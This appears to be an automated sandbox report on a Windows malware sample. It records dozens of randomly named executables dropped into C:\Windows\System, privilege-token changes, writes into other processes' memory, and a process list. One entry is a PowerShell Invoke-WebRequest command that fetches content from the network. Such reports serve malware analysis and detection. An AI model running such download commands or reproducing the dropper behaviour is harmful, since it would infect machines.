File created C:\Windows\System\nsLElFD.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pvlPwWZ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HHMINHg.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CRaHrJi.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iztjyqK.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\szDzRaG.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HeIPQUa.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZRYqfNJ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YQJzXmE.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hXzwHXH.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KyeKeWb.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZkfWefX.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PetOsvN.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tnTeUxI.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\scuxSCc.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CPMEDkn.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wQplFun.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Nkkxhdn.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DDNFklK.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GLBCIuo.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZorJgC.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\azavqzx.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IReFJRE.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LfBfXgu.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cQINfSg.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tuqQyuT.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LDMqVjX.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ISwSLYz.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SXrUOZO.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yzgbguN.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PZWwYIZ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qgoXSBE.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wOFYejD.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QsEukju.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bpvrAby.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zSHJgFp.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XhfPCxc.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\doTiaQe.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qVgkBOD.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qBxfYUn.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TOkgUjM.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rJBViCP.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EWbwfPQ.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FTGhAzB.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rnPbWEr.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QpPZjyA.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZJQNFhs.exe C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4416 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\uaucjTS.exe
PID 4416 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\uaucjTS.exe
PID 4416 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\DCKYaNf.exe
PID 4416 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\DCKYaNf.exe
PID 4416 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\GXVtWeU.exe
PID 4416 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\GXVtWeU.exe
PID 4416 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\MAcvIvH.exe
PID 4416 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\MAcvIvH.exe
PID 4416 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wzZMMtp.exe
PID 4416 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wzZMMtp.exe
PID 4416 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ATScqZF.exe
PID 4416 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ATScqZF.exe
PID 4416 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\QqcgYSi.exe
PID 4416 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\QqcgYSi.exe
PID 4416 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FrhHKZz.exe
PID 4416 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FrhHKZz.exe
PID 4416 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FHXhFqh.exe
PID 4416 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FHXhFqh.exe
PID 4416 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\Uvxwvvr.exe
PID 4416 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\Uvxwvvr.exe
PID 4416 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\qjOgzTR.exe
PID 4416 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\qjOgzTR.exe
PID 4416 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wQplFun.exe
PID 4416 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wQplFun.exe
PID 4416 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\MEGSeyW.exe
PID 4416 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\MEGSeyW.exe
PID 4416 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\lFjMayh.exe
PID 4416 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\lFjMayh.exe
PID 4416 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\oiGeUqL.exe
PID 4416 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\oiGeUqL.exe
PID 4416 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wUvpkHw.exe
PID 4416 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\wUvpkHw.exe
PID 4416 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\idfHsFs.exe
PID 4416 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\idfHsFs.exe
PID 4416 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\UHHVTPZ.exe
PID 4416 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\UHHVTPZ.exe
PID 4416 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FzRcZrv.exe
PID 4416 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FzRcZrv.exe
PID 4416 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\zaxZyxq.exe
PID 4416 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\zaxZyxq.exe
PID 4416 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\EMtlddO.exe
PID 4416 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\EMtlddO.exe
PID 4416 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ycVugRp.exe
PID 4416 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ycVugRp.exe
PID 4416 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\xELLbtx.exe
PID 4416 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\xELLbtx.exe
PID 4416 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ZmlHwyc.exe
PID 4416 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\ZmlHwyc.exe
PID 4416 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\GmiDuat.exe
PID 4416 wrote to memory of 4516 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\GmiDuat.exe
PID 4416 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\vSjEGOY.exe
PID 4416 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\vSjEGOY.exe
PID 4416 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FHpSzWT.exe
PID 4416 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\FHpSzWT.exe
PID 4416 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\TXTwPtW.exe
PID 4416 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\TXTwPtW.exe
PID 4416 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\VLyPsuC.exe
PID 4416 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\VLyPsuC.exe
PID 4416 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\SqPFEVG.exe
PID 4416 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\SqPFEVG.exe
PID 4416 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\jKuVWFK.exe
PID 4416 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe C:\Windows\System\jKuVWFK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\7667923664c6c5a90f0e143ff0dcfce0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\uaucjTS.exe

C:\Windows\System\uaucjTS.exe

C:\Windows\System\DCKYaNf.exe

C:\Windows\System\DCKYaNf.exe

C:\Windows\System\GXVtWeU.exe

C:\Windows\System\GXVtWeU.exe

C:\Windows\System\MAcvIvH.exe

C:\Windows\System\MAcvIvH.exe

C:\Windows\System\wzZMMtp.exe

C:\Windows\System\wzZMMtp.exe

C:\Windows\System\ATScqZF.exe

C:\Windows\System\ATScqZF.exe

C:\Windows\System\QqcgYSi.exe

C:\Windows\System\QqcgYSi.exe

C:\Windows\System\FrhHKZz.exe

C:\Windows\System\FrhHKZz.exe

C:\Windows\System\FHXhFqh.exe

C:\Windows\System\FHXhFqh.exe

C:\Windows\System\Uvxwvvr.exe

C:\Windows\System\Uvxwvvr.exe

C:\Windows\System\qjOgzTR.exe

C:\Windows\System\qjOgzTR.exe

C:\Windows\System\wQplFun.exe

C:\Windows\System\wQplFun.exe

C:\Windows\System\MEGSeyW.exe

C:\Windows\System\MEGSeyW.exe

C:\Windows\System\lFjMayh.exe

C:\Windows\System\lFjMayh.exe

C:\Windows\System\oiGeUqL.exe

C:\Windows\System\oiGeUqL.exe

C:\Windows\System\wUvpkHw.exe

C:\Windows\System\wUvpkHw.exe

C:\Windows\System\idfHsFs.exe

C:\Windows\System\idfHsFs.exe

C:\Windows\System\UHHVTPZ.exe

C:\Windows\System\UHHVTPZ.exe

C:\Windows\System\FzRcZrv.exe

C:\Windows\System\FzRcZrv.exe

C:\Windows\System\zaxZyxq.exe

C:\Windows\System\zaxZyxq.exe

C:\Windows\System\EMtlddO.exe

C:\Windows\System\EMtlddO.exe

C:\Windows\System\ycVugRp.exe

C:\Windows\System\ycVugRp.exe

C:\Windows\System\xELLbtx.exe

C:\Windows\System\xELLbtx.exe

C:\Windows\System\ZmlHwyc.exe

C:\Windows\System\ZmlHwyc.exe

C:\Windows\System\GmiDuat.exe

C:\Windows\System\GmiDuat.exe

C:\Windows\System\vSjEGOY.exe

C:\Windows\System\vSjEGOY.exe

C:\Windows\System\FHpSzWT.exe

C:\Windows\System\FHpSzWT.exe

C:\Windows\System\TXTwPtW.exe

C:\Windows\System\TXTwPtW.exe

C:\Windows\System\VLyPsuC.exe

C:\Windows\System\VLyPsuC.exe

C:\Windows\System\SqPFEVG.exe

C:\Windows\System\SqPFEVG.exe

C:\Windows\System\jKuVWFK.exe

C:\Windows\System\jKuVWFK.exe

C:\Windows\System\YciXjSs.exe

C:\Windows\System\YciXjSs.exe

C:\Windows\System\dYaLAmm.exe

C:\Windows\System\dYaLAmm.exe

C:\Windows\System\WuwYJYb.exe

C:\Windows\System\WuwYJYb.exe

C:\Windows\System\ZRPVvfm.exe

C:\Windows\System\ZRPVvfm.exe

C:\Windows\System\MkmQVKD.exe

C:\Windows\System\MkmQVKD.exe

C:\Windows\System\GBTfMuJ.exe

C:\Windows\System\GBTfMuJ.exe

C:\Windows\System\HcnyeHE.exe

C:\Windows\System\HcnyeHE.exe

C:\Windows\System\iHdjnYd.exe

C:\Windows\System\iHdjnYd.exe

C:\Windows\System\VMKARbr.exe

C:\Windows\System\VMKARbr.exe

C:\Windows\System\WDLIwYZ.exe

C:\Windows\System\WDLIwYZ.exe

C:\Windows\System\baneBjD.exe

C:\Windows\System\baneBjD.exe

C:\Windows\System\YNPjhkI.exe

C:\Windows\System\YNPjhkI.exe

C:\Windows\System\joqKplf.exe

C:\Windows\System\joqKplf.exe

C:\Windows\System\niyglzu.exe

C:\Windows\System\niyglzu.exe

C:\Windows\System\SxssMUr.exe

C:\Windows\System\SxssMUr.exe

C:\Windows\System\CXRPyMU.exe

C:\Windows\System\CXRPyMU.exe

C:\Windows\System\LDjaUyb.exe

C:\Windows\System\LDjaUyb.exe

C:\Windows\System\VxNYqxf.exe

C:\Windows\System\VxNYqxf.exe

C:\Windows\System\SYMIBry.exe

C:\Windows\System\SYMIBry.exe

C:\Windows\System\ubXsWAS.exe

C:\Windows\System\ubXsWAS.exe

C:\Windows\System\pZCFwuf.exe

C:\Windows\System\pZCFwuf.exe

C:\Windows\System\ZPpsXip.exe

C:\Windows\System\ZPpsXip.exe

C:\Windows\System\aTnjsHX.exe

C:\Windows\System\aTnjsHX.exe

C:\Windows\System\XhfPCxc.exe

C:\Windows\System\XhfPCxc.exe

C:\Windows\System\tJdXhHg.exe

C:\Windows\System\tJdXhHg.exe

C:\Windows\System\eoupkda.exe

C:\Windows\System\eoupkda.exe

C:\Windows\System\pGDyadr.exe

C:\Windows\System\pGDyadr.exe

C:\Windows\System\iGsoeNB.exe

C:\Windows\System\iGsoeNB.exe

C:\Windows\System\Nkkxhdn.exe

C:\Windows\System\Nkkxhdn.exe

C:\Windows\System\wOIoKaq.exe

C:\Windows\System\wOIoKaq.exe

C:\Windows\System\ADJWChc.exe

C:\Windows\System\ADJWChc.exe

C:\Windows\System\CIzxgkO.exe

C:\Windows\System\CIzxgkO.exe

C:\Windows\System\TdxNdRO.exe

C:\Windows\System\TdxNdRO.exe

C:\Windows\System\izaIaAA.exe

C:\Windows\System\izaIaAA.exe

C:\Windows\System\gFwbTkS.exe

C:\Windows\System\gFwbTkS.exe

C:\Windows\System\qBUQMid.exe

C:\Windows\System\qBUQMid.exe

C:\Windows\System\TBwnqeb.exe

C:\Windows\System\TBwnqeb.exe

C:\Windows\System\rrDIFMN.exe

C:\Windows\System\rrDIFMN.exe

C:\Windows\System\dmEKXye.exe

C:\Windows\System\dmEKXye.exe

C:\Windows\System\oQjrNqe.exe

C:\Windows\System\oQjrNqe.exe

C:\Windows\System\zqHPoxi.exe

C:\Windows\System\zqHPoxi.exe

C:\Windows\System\zZYSNlZ.exe

C:\Windows\System\zZYSNlZ.exe

C:\Windows\System\JslhweZ.exe

C:\Windows\System\JslhweZ.exe

C:\Windows\System\ukbcNBw.exe

C:\Windows\System\ukbcNBw.exe

C:\Windows\System\UPexPlZ.exe

C:\Windows\System\UPexPlZ.exe

C:\Windows\System\jqoROes.exe

C:\Windows\System\jqoROes.exe

C:\Windows\System\LfBfXgu.exe

C:\Windows\System\LfBfXgu.exe

C:\Windows\System\ISjZTSy.exe

C:\Windows\System\ISjZTSy.exe

C:\Windows\System\ckUrIrA.exe

C:\Windows\System\ckUrIrA.exe

C:\Windows\System\RthRBZa.exe

C:\Windows\System\RthRBZa.exe

C:\Windows\System\eMaDEhS.exe

C:\Windows\System\eMaDEhS.exe

C:\Windows\System\tiSptMR.exe

C:\Windows\System\tiSptMR.exe

C:\Windows\System\nHZPYSY.exe

C:\Windows\System\nHZPYSY.exe

C:\Windows\System\UliLdSX.exe

C:\Windows\System\UliLdSX.exe

C:\Windows\System\ixdcrFi.exe

C:\Windows\System\ixdcrFi.exe

C:\Windows\System\Rppyixe.exe

C:\Windows\System\Rppyixe.exe

C:\Windows\System\RcXnSqK.exe

C:\Windows\System\RcXnSqK.exe

C:\Windows\System\IPhNptd.exe

C:\Windows\System\IPhNptd.exe

C:\Windows\System\DDNFklK.exe

C:\Windows\System\DDNFklK.exe

C:\Windows\System\doTiaQe.exe

C:\Windows\System\doTiaQe.exe

C:\Windows\System\nQOZwwo.exe

C:\Windows\System\nQOZwwo.exe

C:\Windows\System\xswuMtq.exe

C:\Windows\System\xswuMtq.exe

C:\Windows\System\EjPMIKg.exe

C:\Windows\System\EjPMIKg.exe

C:\Windows\System\OoIfbcK.exe

C:\Windows\System\OoIfbcK.exe

C:\Windows\System\ViydBwZ.exe

C:\Windows\System\ViydBwZ.exe

C:\Windows\System\msKXdvy.exe

C:\Windows\System\msKXdvy.exe

C:\Windows\System\AJIUZPV.exe

C:\Windows\System\AJIUZPV.exe

C:\Windows\System\jyhWovC.exe

C:\Windows\System\jyhWovC.exe

C:\Windows\System\cHPVEpm.exe

C:\Windows\System\cHPVEpm.exe

C:\Windows\System\VudPiPS.exe

C:\Windows\System\VudPiPS.exe

C:\Windows\System\ptrltHv.exe

C:\Windows\System\ptrltHv.exe

C:\Windows\System\MlDoPBd.exe

C:\Windows\System\MlDoPBd.exe

C:\Windows\System\ArBvxvh.exe

C:\Windows\System\ArBvxvh.exe

C:\Windows\System\CpeQgYh.exe

C:\Windows\System\CpeQgYh.exe

C:\Windows\System\AprbzVK.exe

C:\Windows\System\AprbzVK.exe

C:\Windows\System\IDoOXzN.exe

C:\Windows\System\IDoOXzN.exe

C:\Windows\System\dyFxWip.exe

C:\Windows\System\dyFxWip.exe

C:\Windows\System\sAiNbfb.exe

C:\Windows\System\sAiNbfb.exe

C:\Windows\System\mjtuATV.exe

C:\Windows\System\mjtuATV.exe

C:\Windows\System\OVjjbkq.exe

C:\Windows\System\OVjjbkq.exe

C:\Windows\System\HJEFQUI.exe

C:\Windows\System\HJEFQUI.exe

C:\Windows\System\JbTjsgj.exe

C:\Windows\System\JbTjsgj.exe

C:\Windows\System\qVgkBOD.exe

C:\Windows\System\qVgkBOD.exe

